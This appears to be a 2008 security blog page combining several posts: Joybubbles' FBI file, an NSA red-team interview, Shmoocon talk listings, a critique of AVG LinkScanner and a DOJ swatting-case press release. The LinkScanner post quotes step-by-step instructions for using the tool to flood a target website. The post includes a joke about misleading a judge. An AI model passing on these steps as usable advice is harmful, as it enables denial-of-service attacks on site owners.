Rosenbaum’s 1971 piece put the spotlight on Engressia, as newspapers, magazines and television programs ran features on him and his activities. Engressia became a cultural icon, or proto-hacker stereotype, as characters with his abilities were written into cyberpunk novels and Hollywood screenplays with characters like Sneakers’ Erwin ‘Whistler’ Emory.

Engressia’s IQ loomed somewhere above 170, but as an adult he wished to live as a 5 years old, founding his own church, the Church of Eternal Childhood. His wish to remain an eternal child appears to be linked to the repeated sexual abuse he reported suffering from a nun at the school for the blind that he attended as a child, as well as the academic pressures that led him to miss out on playtime as a child. In 1991, Engressia legally changed his name to Joybubbles. Until his death this last year, Joybubbles ran a phone “story line” in Minneapolis, where callers would call and hear him tell a different children’s story each week – adopting a cadence and personal style reminiscent of his hero, Mister Rogers.

When Joybubbles died last year, I used the Freedom of Information Act to request his FBI file, mostly just to see what the FBI had made of this explorer who had loved and wandered through this pre-Internet global network. I figured there might be something in his file relating to his 1971 arrest, but I hadn’t expected to find an FBI and phone company investigation of him from two years before this arrest.

Click to read more ...

When it comes to the U.S. government’s computer security, we in the tech press have a habit of reporting only the bad news—for instance, last year’s hacks into Oak Ridge and Los Alamos National Labs, a break-in to an e-mail server used by Defense Secretary Robert Gates … the list goes on and on. Frankly that’s because the good news is usually a bunch of nonevents: “Hackers deterred by diligent software patching at the Army Corps of Engineers.” Not too exciting.

So, in the world of IT security, it must seem that the villains outnumber the heroes—but there are some good-guy celebrities in the world of cyber security. In my years of reporting on the subject, I’ve often heard the National Security Agency’s red team referred to with a sense of breathless awe by security pros. These guys are purported to be just about the stealthiest, most skilled firewall-crackers in the game. Recently, I called up the secretive government agency and asked if it could offer up a top red teamer for an interview, and, surprisingly, the answer came back, “Yes.”

What are red teams, you ask? They’re sort of like the special forces units of the security industry—highly skilled teams that clients pay to break into the clients’ own networks. These guys find the security flaws so they can be patched before someone with more nefarious plans sneaks in. The NSA has made plenty of news in the past few years for warrantless wiretapping and massive data-mining enterprises of questionable legality, but one of the agency’s primary functions is the protection of the military’s secure computer networks, and that’s where the red team comes in.

In exchange for the interview, I agreed not to publish my source’s name. When I asked what I should call him, the best option I was offered was: “An official within the National Security Agency’s Vulnerability Analysis and Operations Group.” So I’m just going to call him OWNSAVAOG for short. And I’ll try not to reveal any identifying details about the man whom I interviewed, except to say that his disciplined, military demeanor shares little in common with the popular conception of the flippant geek-for-hire familiar to all too many movie fans (Dr. McKittrick in WarGames) and code geeks (n00b script-kiddie h4x0r in leetspeak).

So what exactly does the NSA’s red team actually do? They provide “adversarial network services to the rest of the DOD,” says OWNSAVAOG. That means that “customers” from the many branches of the Pentagon invite OWNSAVAOG and his crew to act like our country’s shadowy enemies (from the living-in-his-mother’s-basement code tinkerer to a “well-funded hacker who has time and money to invest in the effort”), attempting to slip in unannounced and gain unauthorized access.

These guys must conduct their work without doing damage to or otherwise compromising the security of the networks they are tasked to analyze—that means no denial-of-service attacks, malicious Trojans or viruses. “The first rule,” says OWNSAVAOG, “is ‘do no harm.’?” So the majority of their work consists of probing their customers’ networks, gaining user-level access and demonstrating just how compromised the network can be. Sometimes, the red team will leave an innocuous file on a secure part of a customer’s network as a calling card, as if to say, “This is your friendly NSA red team. We danced past the comical precautionary measures you call security hours ago. This file isn’t doing anything, but if we were anywhere near as evil as the hackers we’re simulating, it might just be deleting the very government secrets you were supposed to be protecting. Have a nice day!”

Click to read more ...

Shmoocon, founded in 2005, is an American hacker convention organized by The Shmoo Group, and held in the Washington DC area. It was created as an alternative to the Black Hat conference, but at a more affordable price. There are normally about 35 different talks and presentations, on a variety of subjects related to computer security and cyberculture. The Shmoocon Group has recently released videos of  their conference talks for all to enjoy.

Videos from Shmoocon 2008:

• 21st Century Shellcode for Solaris by Tim Vidas [presentation]
• Advanced Protocol Fuzzying - What We Learned When Bringing Layer2 Logic to SPIKE Land by Enno Rey and Daniel Mende
• Baked not Fried Performing an Unauthorized Phishing Awareness Exercise by Syn Phishus [presentation]
• Forced Internet Condom by Aaron Higbee and Jaime Fuentes [presentation]
• Forensic Image Analysis to Recover Passwords by David Smith [presentation]
• Got Citrix Hack It! by Shanit Gupta [presentation]
• Hacking Windows Vista Security by Dan Griffin [presentation]
• Hacking the Samurai Spirit by Isaac Mathis [presentation]
• How do I Pwn Thee Let Me Count the Ways by RenderMan
• Intercepting Mobile PhoneGSM Traffic by H1kari
• Electronic Voting - Risks and Opportunities by Alex Halberman
• Legal Issues for Bot-net Researchers and Mitigators by Alexander Muentz [presentation]
• Malware Software Armoring Circumvention by Danny Quist [presentation]

Click to read more ...

AVG recently activated their Linkscanner product. It scans all the results on a search page and downloads all of the pages. This has led to a skewing of web analytics data on many websites (recording the link scan as a visit even though no human viewed the page), as well as DDOS like effects for sites that appear in many popular searches. Apparently (the Linkscanner downloads all 10/25/50/100 results on the page, even if the visitor never intends to visit the site.

The Linkscanner is easy to game. It has many features which give away its usage, not least the odd UA string. Linkscanner is easily fooled by sending it “nice” content, while delivering something else once the user clicks the link in the SERPs.

A “proof of concept” of this attack is explained:

Here’s how to do a DoS attack with your free AVG 8 download with LinkScanner, available from CNET’s download.com:

1. Set your Google preference to 100 links per page.
2. Search for site:www.byebyesucker.com in Google.
3. Now AVG’s LinkScanner downloads every one of Google’s links for that site at a rate of about 2 to 12 site pages per second, depending on the page size.
4. Refresh Google’s search results when LinkScanner is nearly finished. There is no caching by LinkScanner, so you can rinse, lather, and repeat.

We tried this on our own site from an average DSL connection, and then looked at our log. LinkScanner grabbed 600 complete pages (but no images) in three minutes flat. This included 230 downloads of the home page and 370 downloads of deep pages that averaged 50K each. The home page pig-out is a LinkScanner specialty — it was presented with a home-page link by Google only twice, which should have meant just two downloads instead of 230.

Of course, if you try this the webmaster might detect it and track you down through your IP address. Here’s what you tell the judge:

“Gosh, Your Honor, I kept getting this gray checkmark from AVG and I tried to get it to turn green by clicking again and again. I don’t dare visit a website that isn’t all green. As you know, Your Honor, the Internet is not a safe place for God-fearing people like us. It’s full of porn and other dangerous stuff. I didn’t think I was doing anything wrong. Please look at all these recommendations for AVG’s security products from respected high-tech reviewers that I’ve collected!”

No one has attacked us, but just from the normal use of the AVG LinkScanner by enthusiastic but clueless AVG customers, we saw our traffic spike on one of our sites. On 2008-06-03 we started counting when a home-page image is fetched. This new method eliminates bots. We had to do this because the previous method of counting the page fetch itself included bots, and the numbers were getting suspicious. Sure enough, a few days later it went crazy. This graph shows the old-style counts on top, and the new-style counts on a blue line below it:


At first we suspected a script kiddie was using this page to test the growth of his nascent botnet, because the IP addresses for the extra traffic came from all over the world. But looking closer, we discovered that the culprit is AVG’s LinkScanner component in the new version of their product. They think it’s really clever to scan every link returned by a search on Google or Yahoo or Live.com, by downloading every site’s home page. This happens even when the searcher never intends to click on any links. In order to foil the bad guys, AVG tries to make the scans appear to be normal traffic from that person’s browser. It’s called “real-time link scanning” and a lot of webmasters are furious. In the end, it’s a lesson in how to stop the bad guys by becoming a bigger bad guy. We had to throw out our old-style graphs, which tracked home page traffic beginning 2006-09-01.

If you are a webmaster, here’s a sample of logs. We pulled these out of our access_log with this command:
grep “GET / ” access_log |grep ” 200 ” |grep -v “http” >newfile
This command asks for the home page downloads without a referrer. For a better check of a daily log, you should cross-check this against a list of IP addresses that downloaded an image from your home page that same day. This will eliminate any real eyeballs, and the IP addresses that remain will be automatic fetches. Some will be real web crawlers, but those tend to grab a single page once or twice a day, and then move along. Using this technique, you can zero in on the IP addresses of AVG users. Currently there are two typical user-agents in use, but this is expected to change.

 

151.80.8.182 - - [26/Jun/2008:15:59:58 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
 166.82.153.56 - - [26/Jun/2008:16:01:45 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 82.74.194.58 - - [26/Jun/2008:16:03:30 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 70.153.219.173 - - [26/Jun/2008:16:03:45 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 217.42.17.151 - - [26/Jun/2008:16:04:18 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 217.42.17.151 - - [26/Jun/2008:16:04:18 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 71.93.77.12 - - [26/Jun/2008:16:06:58 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:07:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:07:55 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:08:00 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 71.52.168.50 - - [26/Jun/2008:16:08:12 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 190.51.252.203 - - [26/Jun/2008:16:11:39 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 70.183.78.109 - - [26/Jun/2008:16:11:51 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 68.186.130.118 - - [26/Jun/2008:16:13:20 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 86.166.79.223 - - [26/Jun/2008:16:14:40 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 70.137.193.72 - - [26/Jun/2008:16:16:10 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 85.157.155.19 - - [26/Jun/2008:16:19:34 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 86.131.108.17 - - [26/Jun/2008:16:20:12 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 189.25.180.208 - - [26/Jun/2008:16:23:05 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 76.11.24.146 - - [26/Jun/2008:16:23:42 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 24.149.48.161 - - [26/Jun/2008:16:28:34 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 70.121.168.15 - - [26/Jun/2008:16:41:05 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 68.230.165.141 - - [26/Jun/2008:16:43:02 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:45:00 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:45:08 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.188.105.227 - - [26/Jun/2008:16:45:22 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 62.56.82.163 - - [26/Jun/2008:16:45:28 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 98.221.155.122 - - [26/Jun/2008:16:49:52 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 216.221.63.215 - - [26/Jun/2008:16:53:56 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
 201.35.234.217 - - [26/Jun/2008:16:55:14 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
 24.64.223.204 - - [26/Jun/2008:16:56:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 75.23.220.22 - - [26/Jun/2008:16:57:19 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 86.17.203.158 - - [26/Jun/2008:16:57:22 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 79.22.215.251 - - [26/Jun/2008:16:57:40 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 75.70.75.226 - - [26/Jun/2008:16:57:41 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 75.70.75.226 - - [26/Jun/2008:16:57:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 82.18.49.107 - - [26/Jun/2008:17:00:39 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 69.153.117.96 - - [26/Jun/2008:17:01:04 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 71.206.201.239 - - [26/Jun/2008:17:01:14 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 98.221.155.122 - - [26/Jun/2008:17:29:07 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 71.81.50.51 - - [26/Jun/2008:17:30:29 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.164.8.43 - - [26/Jun/2008:17:30:32 -0400] "GET / HTTP/1.0" 200 6909 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0"
 24.119.124.97 - - [26/Jun/2008:17:30:59 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 89.142.244.209 - - [26/Jun/2008:17:34:48 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 58.69.119.178 - - [26/Jun/2008:17:36:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 200.145.101.5 - - [26/Jun/2008:17:50:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
 76.66.56.189 - - [26/Jun/2008:17:52:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 193.164.8.43 - - [26/Jun/2008:17:59:40 -0400] "GET / HTTP/1.0" 200 6909 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0"
 92.0.150.180 - - [26/Jun/2008:18:00:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 64.62.142.170 - - [26/Jun/2008:18:02:26 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
 64.126.72.52 - - [26/Jun/2008:18:13:53 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 70.171.216.33 - - [26/Jun/2008:18:14:03 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 12.214.27.179 - - [26/Jun/2008:18:16:20 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 68.231.107.177 - - [26/Jun/2008:18:23:37 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 

There are two legitimate Linux fetches in this list, but you can see the two user-agents that are currently being used. The “1813” user-agent is disappearing now, in favor of the “SV1”. Presumably this is because users are clicking the “update” button on their AVG installation and getting new instructions. The CNET download we did that same day used only 1813. That’s probably because we were careful to refuse any updates from AVG as we installed it, by disallowing access when our firewall popped up and notified us that some new program was trying to connect to the Internet. AVG’s stated intention is to make their prefetches look like normal browser visits, in order to hide their presence from bad guys.

This LinkScanner component is not a minor issue. AVG claims five million downloads of this free security product during the last week of May, and 70 million users worldwide. We can’t wait until they all get updated with what LinkScanner has to offer.

 

DALLAS — An un-indicted co-conspirator in a swatting conspiracy case that was recently prosecuted in the Northern District of Texas, who was a minor when the case was filed, has now been charged by a federal grand jury with obstruction of justice and conspiring to obstruct justice for threatening a witness in that case, announced U.S. Attorney Richard B. Roper of the Northern District of Texas. The grand jury also charged two other defendants in the same indictment with related offenses.

Matthew Douglas Weigman, 18, of Revere, Massachusetts, appeared before U.S. Magistrate Judge Irma C. Ramirez in Dallas yesterday for an initial appearance and arraignment. He had earlier appeared in U.S. District Court in Massachusetts for his detention hearing shortly after his arrest near Boston last month. According to the affidavit filed with the criminal complaint in the case, Matthew Weigman is blind.

Co-defendant Carlton Nalley, who lives in Alexandria, Virginia, was charged in the indictment with one count of obstruction of justice. Yesterday, he also appeared before Judge Ramirez in Dallas, who released him on standard conditions, plus additional conditions which include prohibiting any contact with any actual or potential victims, witnesses, or informants in the case. Co-defendant Sean Paul Benton, 22, of Malden, Massachusetts, was arrested last month and is charged with the same offenses as Weigman. Benton has also appeared before a magistrate judge in U.S. District Court in Boston and had been detained until today, when he was released from custody and ordered to surrender to the U.S. Marshals Service in Dallas on Tuesday, July 8, 2008, for a court appearance in the Northern District of Texas later that day. A trial date has not yet been set for any of the defendants.

The indictment alleges that from the beginning of April 2008 until May 28, 2008, Weigman, Benton, and others, used intimidation, threats, and corrupt persuasion, and knowingly engaged in misleading conduct toward a witness, a Verizon fraud investigator, in an ongoing federal investigation into his, Nalley’s and other’s conduct in relation to the ongoing conspiracy alleged in the swatting conspiracy case, U.S. v. Stuart Rosoff, et al, 3:07 CR-196-B.

For instance, Weigman and Benton, with the unauthorized use of access devices, modified the witness’s personal telecommunications instruments, verbally harassed him, physically appeared at his residence without permission or invitation, with the intent to hinder, delay, and prevent him from speaking to a federal law enforcement officer about their involvement, or other’s involvement, in the commission of possible federal offenses. According to the criminal complaint, the “visit” occurred on a Sunday and Weigman lives approximately 66 miles from the witness.

The indictment alleges that Carlton Nalley intended to retaliate against the witness for providing a federal law enforcement officer truthful information regarding the commission of federal offenses by Nalley by attempting to interfere with his lawful employment or livelihood by making phone calls to the witness’s supervisor and providing false and misleading information in an attempt to have the witness fired.

According to the affidavit filed with the criminal complaint in the case, in December 2006, FBI agents executed a search warrant at Weigman’s home and because he was a minor, interviewed him in his mother’s presence. He agreed to cooperate with the FBI, however, instead, he continued his criminal activities, including attempting to gain access to the Dallas U.S. Attorney’s Office voice mail system. Weigman continued his criminal activity despite the warnings and the FBI severed its relationship with Weigman in early 2007. At that time, the government notified him in writing that he was a target of a federal investigation.

U.S. Attorney Roper praised the investigative efforts of the FBI. The case is being prosecuted by Assistant U.S. Attorney Candy Heath.